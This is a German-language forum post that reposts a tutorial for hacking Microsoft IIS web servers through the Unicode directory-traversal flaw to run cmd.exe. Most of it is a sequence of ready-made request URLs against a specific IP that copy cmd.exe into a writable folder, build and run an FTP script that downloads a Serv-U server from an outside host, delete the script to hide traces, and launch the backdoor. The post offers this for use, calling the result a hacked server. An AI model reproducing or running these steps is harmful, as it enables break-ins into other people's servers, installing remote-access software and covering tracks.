Vollständige Version anzeigen : [Hacking] Another IIS Hacking Tut


Dr.Ogen
25.08.2007, 21:55

Nabend,
das Tutorial stammt nicht von mir ;)
Habe nen paar Threads bzgl IIS gesehen und dachte mir joooo das postet du mal ;)

Viel Spass

Also erstmal um den befehl an sich zu verstehn, z;b;:

h**p://218;29;50;94//scripts/;%252e/;%252e/winnt/system32/cmd;exe?/c+dir+c:\

der befehl besteht aus 2 teilen.

teil 1: h**p://218;29;50;94//scripts/;%252e/;%252e/winnt/system32/cmd;exe?/ <--- das ist der unicode (das ? heißt das er über die datei "cmd;exe" ausgeführt werden soll)

teil 2: c+dir+c:\ <--- das ist der teil in dem du dem server sagst was er machen soll c = der befehl soll sofort ausgeführt werden
dir+c:\ = der normale DOS befehl
+ = platzhalter (also anstelle von leertaste)

So, nun mal alle befehle mit erklärung hintereinander:

h**p://218;29;50;94//scripts/;%252e/;%252e/winnt/system32/cmd;exe?/c+copy+c:\winnt\system32\cmd;exe+c:\Inetpub\scripts\r00t;exe

bei diesem befehl erstellst du dir dein eigenen unicode, den du dann im späteren verlauf benutzt. Das is nötig da man meißt keine rechte hat auser im ordner C:\inetpub\scripts (zu 90%) und in dem ordner der im unicode ganz vorne steht.


h**p://218;29;50;94/scripts/r00t;exe?/c+mkdir+c:\Recycler\

mit dem befehl erstellst du das verzeichniss c:\recycler (eigentlich klar^^)


h**p://218;29;50;94/scripts/r00t;exe?/c+echo+open+84;235;152;291+21>>C:\Recycler\ftp;vbl
h**p://218;29;50;94/scripts/r00t;exe?/c+echo+user>>C:\Recycler\ftp;vbl
h**p://218;29;50;94/scripts/r00t;exe?/c+echo+pw>>C:\Recycler\ftp;vbl
h**p://218;29;50;94/scripts/r00t;exe?/c+echo+BINARY>>C:\Recycler\ftp;vbl
h**p://218;29;50;94/scripts/r00t;exe?/c+echo+get+serv-u;exe>>C:\Recycler\ftp;vbl
h**p://218;29;50;94/scripts/r00t;exe?/c+echo+get+serv-u;ini>>C:\Recycler\ftp;vbl
h**p://218;29;50;94/scripts/r00t;exe?/c+echo+quit>>C:\Recycler\ftp;vbl

mit den befehlen erstellst du das ftp script (kennst du bestimmt von mssql, fals du das schon mal gehaxxt hast)


h**p://218;29;50;94/scripts/r00t;exe?/c+ftp+-s:C:\Recycler\ftp;vbl

mit dem befehl startest du das ftp script


h**p://218;29;50;94/scripts/r00t;exe?/c+move+C:\inetpub\scripts\serv-u;exe+c:\Recycler\
h**p://218;29;50;94/scripts/r00t;exe?/c+move+C:\inetpub\scripts\serv-u;ini+c:\Recycler\
mit den befehlen bewegst du deine servu;ini u. exe in den ordner c;\recycler


h**p://218;29;50;94/scripts/r00t;exe?/c+del+C:\Recycler\ftp;vbl

mit dem befehl löscht du das ftp script (spurenbeseitigung)


h**p://218;29;50;94/scripts/r00t;exe?/c+dir+c:\Recycler\

mit dem befehl kannst du kontrollieren ob deine servu datein am richtigen ort sind


h**p://218;29;50;94/scripts/r00t;exe?/c+call+c:\Recycler\serv-u;exe

und mit dem befehl startest du deine servu. der server sollte im bestfall jetzt gehaxxt sein^^ und du solltest mit servu und flashfxp connecten können.


securen tust du den server indem du die exe datei am ende des unicodes suchst und löschst^^. geht bei der cmd;exe nicht immer, da man meist im ordner c:\winnt\system32\ keine rechte hat. ien anderer weg wäre user zu dumpen (ka wie das geht).

wenn ihr mal net wisst was schon alles in der ftp;vbl steht, könnt ihr wuch die datei mit dem befehl "type" anzeigen lassen.


Für Fragen oder Ähnliches stehe ich nicht zur verfügung ;)

Greets Ogen

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Ähnliche Themen zu [Hacking] Another IIS Hacking Tut
  • [Hacking] 2 Tuts zu "Pub Hacking"
    So hier mal 2 Tuts zum Pub Hacking, ich würde sagen sogar recht ausführlich ;) Wer Interesse hat kann es ja mal laden ;) Tuts stammen nicht von mir .. ;) Download: http:xupraidrushwsdownloadphpvalid1idb2bdc81157f71d6c273cf8d6a8cdf;rar | xup~in (;xup~in/dl,14562458/http:xupraidrushwsdownload [...]

  • [Hacking] Über WLAN und WLAN-Hacking
    [+] Was ist das Eigentlich? [+] Aufbau-Möglichkeiten [+] Begriffserklärung [+] Was ist WEP? [+] WEP unsicher! [+] WLAN absichern! [+] WLAN hacking [+] Eigenes WLAN auf Schwächen testen! [+] Wardriving Hardware ---------------------------------------------------------------------- -- WTF? Was ist [...]

  • [Hacking] Stro Hacking
    Hi, Habe mal n nettes Tutorial gefunden wie man Stros hackt: Download: http:xupraidrushwsdownloadphpvalid1id0d9e1932170400b08df972cc8aaa5;doc | xup~in (;xup~in/dl,19440182/http:xupraidrushwsdownloadphpvalid1id0d9e1932170400b08df972cc8aaa5;doc/) Hoffe es hilft und/oder gefäkkt euch :) P; [...]

  • [Hacking] Hacking via Google
    Wie funktioniert Google? ---------------------------- ---------------------------- Google ist zu nächst mal eine voll automatische Suchmaschine, die mit Hilfe von so genannten Spidern (Suchrobotern), das gesamte Web durchsucht und die gefunden Websites indiziert. D;h es ist eigentlich nicht [...]

  • [Hacking] TomTom Go Hacking
    Eine echt geile dokumentation von studenten? Sehr Sehr Sehr viel know how , linux grundkenntnissse vorrausgesetzt~Es geht darum das die jungs das navi system gehackt haben und nun in der lage sind sämtliche funktionen mit dem tomTom zu machen aller mp3 player , umwandlung in einen wardriving system [...]



raid-rush.ws | Imprint & Contact pr